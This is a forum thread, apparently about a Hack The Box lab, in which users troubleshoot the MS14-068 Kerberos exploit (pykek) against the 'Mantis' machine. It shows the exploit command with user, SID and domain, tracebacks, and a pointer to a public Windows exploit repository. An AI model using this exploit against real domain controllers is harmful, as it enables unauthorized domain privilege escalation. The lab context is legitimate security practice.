Root@kali:~/Documents/mantis# python ms14-68.py -u james@HTB.LOCAL -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d MANTIS
Traceback (most recent call last):
File “ms14-68.py”, line 17, in
from kek.ccache import CCache, get_tgt_cred, kdc_rep2ccache
ImportError: No module named kek.ccache
i am getting above error.
please help.
git clone GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合
Grabbing the whole repo so you are not missing the pykek cache.
And then simply just go over to cd windows-kernel-exploits
And do another cd into MS14-068/pykek
Problem solved.
WARN
If you are about to use the pykek exploit be sure that it ain’t gonna work for the Active box, it’s patched.
still not work this exploit////
[+] Building AS-REQ for mantis.htb.local… Done!
[+] Sending AS-REQ to mantis.htb.local… Done!
[+] Receiving AS-REP from mantis.htb.local… Done!
[+] Parsing AS-REP from mantis.htb.local…Traceback (most recent call last):
File “./ms14-068.py”, line 189, in
sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename)
File “./ms14-068.py”, line 48, in sploit
as_rep, as_rep_enc = decrypt_as_rep(data, user_key)
File “/opt/windows-kernel-exploits/MS14-068/pykek/kek/krb5.py”, line 431, in decrypt_as_rep
return _decrypt_rep(data, key, AsRep(), EncASRepPart(), 8)
File “/opt/windows-kernel-exploits/MS14-068/pykek/kek/krb5.py”, line 419, in _decrypt_rep
rep = decode(data, asn1Spec=spec)[0]
File “/opt/windows-kernel-exploits/MS14-068/pykek/pyasn1/codec/ber/decoder.py”, line 792, in call
stGetValueDecoder, self, substrateFun
File “/opt/windows-kernel-exploits/MS14-068/pykek/pyasn1/codec/ber/decoder.py”, line 55, in valueDecoder
value, _ = decodeFun(head, asn1Spec, tagSet, length)
File “/opt/windows-kernel-exploits/MS14-068/pykek/pyasn1/codec/ber/decoder.py”, line 798, in call
‘%r not in asn1Spec: %r’ % (tagSet, asn1Spec)
pyasn1.error.PyAsn1Error: TagSet(Tag(tagClass=0, tagFormat=32, tagId=16), Tag(tagClass=64, tagFormat=32, tagId=30)) not in asn1Spec: AsRep()